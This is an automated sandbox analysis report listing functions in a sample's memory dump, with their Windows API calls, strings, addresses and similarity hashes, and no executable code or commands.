Instruction Fuzzy Hash: B521B5353002119FEB21AF64DC09B6E7BA8FF49750F048019F9C5DB2A6DB7DA800CB54

Function 00FF37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F94743,?,?,00F937AE,?), ref: 00F94770

Part of subcall function 00FF4A31: GetFileAttributesW.KERNEL32(?,00FF370B), ref: 00FF4A32

FindFirstFileW.KERNEL32(?,?), ref: 00FF38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00FF394B
MoveFileW.KERNEL32(?,?), ref: 00FF395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00FF397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FF399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00FF39B9

Strings

\*.*, xrefs: 00FF384E, 00FF3857, 00FF386C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 1bfd76763ecf03d00f5da0d336183459158d7ceed1739a71ceeeb51ff2693561
Instruction ID: a3c5cb83cfdf78a58a8cd8225d64c5fcf761fe3c34977bd74854daca7b88ea5d
Opcode Fuzzy Hash: 1bfd76763ecf03d00f5da0d336183459158d7ceed1739a71ceeeb51ff2693561
Instruction Fuzzy Hash: BF51AC31C0524DAADF11FBA0CD929FEB779AF10310F600069E402B71A1EB696F0DEB61

Function 00FFF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00FFF440
Sleep.KERNEL32(0000000A), ref: 00FFF470
_wcscmp.LIBCMT ref: 00FFF484
_wcscmp.LIBCMT ref: 00FFF49F
FindNextFileW.KERNEL32(?,?), ref: 00FFF53D
FindClose.KERNEL32(00000000), ref: 00FFF553

Strings

*.*, xrefs: 00FFF425

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: d6f2b6f36d3d489e64e2a9b79431cae2a0be4cf2b8fc1c5cdd899399f650ff63
Instruction ID: 75f13333284c7198772be2786c58ba5145ec30405e39d3dbb200a75777eb3eed
Opcode Fuzzy Hash: d6f2b6f36d3d489e64e2a9b79431cae2a0be4cf2b8fc1c5cdd899399f650ff63
Instruction Fuzzy Hash: 54417D71C0020E9BDF14EF64DC45AFEBBB4FF05320F184466E919A61A0EB349A48EF50

Function 00FA5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FA58A5
_memmove.LIBCMT ref: 00FA58F5
_memmove.LIBCMT ref: 00FA595B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: e2e3f10cb16f40e5a15c0fdfba2feb7780816a3c0ad4f0de00345e60f5023e8e
Instruction ID: 2376763a8d21c3f4cafb2418d3ff770ac472f95c6d6366d8818025e2d4d3080c
Opcode Fuzzy Hash: e2e3f10cb16f40e5a15c0fdfba2feb7780816a3c0ad4f0de00345e60f5023e8e
Instruction Fuzzy Hash: 2D129CB0A00609DFDF14DFA6D981AEEB7F5FF48310F104529E846E7290EB39A951EB50

Function 00FF3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F94743,?,?,00F937AE,?), ref: 00F94770

Part of subcall function 00FF4A31: GetFileAttributesW.KERNEL32(?,00FF370B), ref: 00FF4A32

FindFirstFileW.KERNEL32(?,?), ref: 00FF3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00FF3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FF3BEA
FindClose.KERNEL32(00000000), ref: 00FF3C01
FindClose.KERNEL32(00000000), ref: 00FF3C0A

Strings

\*.*, xrefs: 00FF3B5B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: bca4dae1a9cebd7048eb5a898bef853834ab7f7c821d51fdcbfa284a5f652dea
Instruction ID: 26454fc1718366e7535593dee88b0c8efe953525e4c3ac3a64f77f84bd8285ba
Opcode Fuzzy Hash: bca4dae1a9cebd7048eb5a898bef853834ab7f7c821d51fdcbfa284a5f652dea
Instruction Fuzzy Hash: D9319A314083899BD701FF64D8918BFB7E8AE91314F404E1DF5D5921A1EB29DA0DEBA3

Function 00FF51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FE882B
Part of subcall function 00FE87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FE8858
Part of subcall function 00FE87E1: GetLastError.KERNEL32 ref: 00FE8865

ExitWindowsEx.USER32(?,00000000), ref: 00FF51F9

Strings

SeShutdownPrivilege, xrefs: 00FF51C9
@, xrefs: 00FF51EC
, xrefs: 00FF51E7

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 3481a99ff43ccfc438000b5133ba27bbd33032e78863fdf1be084613be301293
Instruction ID: f40e70551fc355214bea56ae437f8dac7a35eb4e8b35bbb2c685759a5a6f2690
Opcode Fuzzy Hash: 3481a99ff43ccfc438000b5133ba27bbd33032e78863fdf1be084613be301293
Instruction Fuzzy Hash: 0B017031B9161A5BF73861649C8AFB77258EF05B50F240664FB47E20E1DA551C056190

Function 01006283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010062DC
WSAGetLastError.WSOCK32(00000000), ref: 010062EB
bind.WSOCK32(00000000,?,00000010), ref: 01006307
listen.WSOCK32(00000000,00000005), ref: 01006316
WSAGetLastError.WSOCK32(00000000), ref: 01006330
closesocket.WSOCK32(00000000,00000000), ref: 01006344

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 006fc466b4caa74e73cae7775cb3a66c25ba4638a58214139f9a9b6cf3240556
Instruction ID: c4793b1080a0f8563cb9b58d5c1cb8822296763d25ad93391c584513587c753c
Opcode Fuzzy Hash: 006fc466b4caa74e73cae7775cb3a66c25ba4638a58214139f9a9b6cf3240556
Instruction Fuzzy Hash: 2321DB302002059FEB10EF68C845A6EB7EAEF48320F14815DE896A72C1CB79AD05CB91

Function 00FA5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00FB0DB6: std::exception::exception.LIBCMT ref: 00FB0DEC
Part of subcall function 00FB0DB6: __CxxThrowException@8.LIBCMT ref: 00FB0E01

_memmove.LIBCMT ref: 00FE0258
_memmove.LIBCMT ref: 00FE036D
_memmove.LIBCMT ref: 00FE0414

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 9e7a158142fa82b807e005b30e88135e26878e7cc95b482d8195f4c376a0e571
Instruction ID: 5e56edb5ecf65cd8fe0c0eb9650229262d809b804b60103de0baa9aec80a9190
Opcode Fuzzy Hash: 9e7a158142fa82b807e005b30e88135e26878e7cc95b482d8195f4c376a0e571
Instruction Fuzzy Hash: 6102DFB0E00209DFDF04DF65D981AAEBBB5EF44310F148069E80ADB295EF79D950EB90

Function 00F91287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00F919FA
GetSysColor.USER32(0000000F), ref: 00F91A4E
SetBkColor.GDI32(?,00000000), ref: 00F91A61

Part of subcall function 00F91290: DefDlgProcW.USER32(?,00000020,?), ref: 00F912D8

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 55e7008be0786ff7b076e034aeba10801ed15d1d69c71e495696b191dc8834d3
Instruction ID: c4149c8c27a18a75178ca9f8418c26dcec5b685ebb8121d87c8729dd65ca4faf
Opcode Fuzzy Hash: 55e7008be0786ff7b076e034aeba10801ed15d1d69c71e495696b191dc8834d3
Instruction Fuzzy Hash: A2A15472502547BAFF38AA298D4AFBB355DFB42361F10012EF582D2185CA2D9D01F7B2

Function 00FFBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FFBCE6
_wcscmp.LIBCMT ref: 00FFBD16
_wcscmp.LIBCMT ref: 00FFBD2B
FindNextFileW.KERNEL32(00000000,?), ref: 00FFBD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00FFBD6C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 1e621ca4600da816a109d89e0b507bf86e5dcff347da0f3e5d94be5292e36aa2
Instruction ID: 2a3dba66cb84c59af37eec3d5b7d379fa1f87a62cd93ec0411a069535d17a08f
Opcode Fuzzy Hash: 1e621ca4600da816a109d89e0b507bf86e5dcff347da0f3e5d94be5292e36aa2
Instruction Fuzzy Hash: 91518D35A047069FDB14DF68C890EAAB3E4EF49320F14461DEA56873A1DB34ED04DB92

Function 01006747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 01007D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01007DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0100679E
WSAGetLastError.WSOCK32(00000000), ref: 010067C7
bind.WSOCK32(00000000,?,00000010), ref: 01006800
WSAGetLastError.WSOCK32(00000000), ref: 0100680D
closesocket.WSOCK32(00000000,00000000), ref: 01006821

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 5d06675792205bf988324d106f08d7ec025c7e86b46c1050682f122e72a3467d
Instruction ID: 3ebe2102b202ec0317c54c344d18399a131e493d6d34186788a88e5e8cca51bb
Opcode Fuzzy Hash: 5d06675792205bf988324d106f08d7ec025c7e86b46c1050682f122e72a3467d
Instruction Fuzzy Hash: D441F071A00210AFEF11AF288C82F3E77E8EB45750F45805CF959AB3C2DAB99D019791

Function 01015376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 010153C5
IsWindowEnabled.USER32 ref: 010153D3
GetForegroundWindow.USER32(?,?,00000001), ref: 010153E0
IsIconic.USER32 ref: 010153EE
IsZoomed.USER32 ref: 010153FC

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: c168989f8f93e6b406fa77b1433891295ea94d3201d771f665dafdf9dde59875
Instruction ID: 10465b05e6f030634ea236345a19f61b5f45dcdbb0e1df4e37afda64013e8918
Opcode Fuzzy Hash: c168989f8f93e6b406fa77b1433891295ea94d3201d771f665dafdf9dde59875
Instruction Fuzzy Hash: 591101313005116FEB216F2ADC44A6EBBD8FFC6360F408428F9C6DB245CBBCD8018AA0

Function 00FE80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FE80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FE80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FE80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FE80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FE80F6

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f42dd4e3b036155c685e18bd34b62933ad07a71041aa6c3692d55d61af03d583
Instruction ID: 1bc7b0546a1b7f148c52e27b4ee79c91e659ddca96a8583d015acf98daefd846
Opcode Fuzzy Hash: f42dd4e3b036155c685e18bd34b62933ad07a71041aa6c3692d55d61af03d583
Instruction Fuzzy Hash: 5EF0C870240205AFD7215F65DC8CE673BADEF457A4B000015F549C2150CB699D06DB60

Function 00F94B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F94AD0), ref: 00F94B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F94B57

Strings

GetNativeSystemInfo, xrefs: 00F94B51
kernel32.dll, xrefs: 00F94B40

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: f4e066b656d3da854198417feacfaa6098e5119c40a993578af889967054cd65
Instruction ID: 62ca0c003cec8d2423346201cb0228d6ce4277cb7d9b88c2619abe660d2a01fe
Opcode Fuzzy Hash: f4e066b656d3da854198417feacfaa6098e5119c40a993578af889967054cd65
Instruction Fuzzy Hash: 41D01234E10713CFDB209F32E868B0676E4BF55265B11882D94C5D6108D67CE884C754

Function 00FA3030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 9a78e25e214b98d839b64f361f0a8c6747abdd63693d6eff8692ae870ee0551a
Instruction ID: dbbfd7505421dab3f8107087baf64ceea5cd85b5c66fe164fc8f188195ddcd99
Opcode Fuzzy Hash: 9a78e25e214b98d839b64f361f0a8c6747abdd63693d6eff8692ae870ee0551a
Instruction Fuzzy Hash: B422BDB1A083009FDB24DF24C881B6FB7E5AF89710F14491DF89A97391DB75E904EB92

Function 0100EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0100EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0100EE4B

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Process32NextW.KERNEL32(00000000,?), ref: 0100EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0100EF1A

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 76192b876220b3c459a2789629d9c57964226cb4e2af8995ec194aa40dafcdea
Instruction ID: cf5e203b69f4fe74b12e1da49506dc55553837a079548f379aad21a3c60069a5
Opcode Fuzzy Hash: 76192b876220b3c459a2789629d9c57964226cb4e2af8995ec194aa40dafcdea
Instruction Fuzzy Hash: 4B51A171508701AFE721EF24CC81E6BB7E8EF95710F40482DF595972A1EB74E908CB92

Function 00FEE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FEE628

Strings

|, xrefs: 00FEE658
(, xrefs: 00FEE66E

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 6aaee0f39dfa30d8ff7e276bbbfcac377b0f7a67567ca910ad48bb71f2bbb81f
Instruction ID: 2267c395687eef19863bd0d3ac08dc033c91b014f9a1df54836a2b579bca5f12
Opcode Fuzzy Hash: 6aaee0f39dfa30d8ff7e276bbbfcac377b0f7a67567ca910ad48bb71f2bbb81f
Instruction Fuzzy Hash: 55323775A007059FD728CF1AD481AAAB7F1FF48320B15C46EE89ADB3A1D770E941CB40

Function 010022EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0100180A,00000000), ref: 010023E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01002418

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 4ea9630474a74755ea0d459306f2e01911ea56928924d22b1d8f0ccd0d694cc1
Instruction ID: 3a5db5ac8a07e5167f043d065de7de2dbd3b2a86564ec9f0be6c5f965cd5c0d6
Opcode Fuzzy Hash: 4ea9630474a74755ea0d459306f2e01911ea56928924d22b1d8f0ccd0d694cc1
Instruction Fuzzy Hash: AF41E871904209BFFB22DE99DC89FBF77FCEB40714F0080AAF685A6181DB759E419A50

Function 00FFB3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FFB40B
